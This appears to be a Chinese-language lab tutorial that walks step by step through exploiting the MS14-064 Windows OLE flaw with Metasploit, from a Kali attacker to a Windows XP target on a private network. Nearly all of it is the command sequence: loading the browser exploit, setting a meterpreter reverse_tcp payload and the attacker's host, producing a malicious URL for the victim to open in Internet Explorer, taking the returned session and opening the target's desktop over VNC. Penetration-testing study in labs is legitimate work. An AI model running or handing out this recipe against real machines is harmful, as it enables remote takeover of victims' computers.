简介：

1. Microsoft Windows OLE 远程代码执行漏洞，影响Win95+IE3 - Win10+IE11全版本。
2. 这个漏洞就是 ，点击网址的时候不要默认ie哦~
3. 记住tab健的作用，上一篇Metasploit信息收集已经介绍了，不知道的可以去看看。
4. 本文用 # 作为注释。

 环境：

• 攻击机：kali linux2.0 攻击机IP：192.168.2.111
• 靶机：Windows XP 靶机IP：192.168.2.114

1、ping 192.168.2.114 # 攻击ping靶机看能不能通 

 # ping到靶机了，现在就可以开始测试了。

2、msfconsole  # kali终端打开

3、search ms14_064  # 查找 ms14-064漏洞

4、use exploit/windows/browser/ms14_064_ole_code_execution  # 使用这个漏洞

5、show options # 查看需要设置的参数 yes就代表要设置的参数

6、set  AllowPowershellPrompt true # 设置成开启

7、set SRVHOST 192.168.2.111 # 设置本机IP 

8、set payload windows/meterpreter/reverse_tcp  # 设置后渗透

9、show missing # 查看后渗透需要设置的参数

10、set LHOST 192.168.2.111 # 设置本机IP

11、run # 开始生成病毒网址

#  http://192.168.2.111:8080/OzZUl3xnfA6L47 就是病毒网址

12、我们进入靶机使用 ie 打开这个网址

​

13、 我们返回攻击机查看是否有电脑连接了这个网址

​

# 可以看到192.168.2.114 这个IP连接了这个网址 

14、sessions  # 在kali终端回车查看sessions后台

# 我们可以通过session连接目标主机

15、sessions -i 1 # 通过Id进入会话

16、run vnc # 打开靶机桌面 

# 我们已经成功，开启靶机桌面渗透结束。

完：多多使用 Tab健。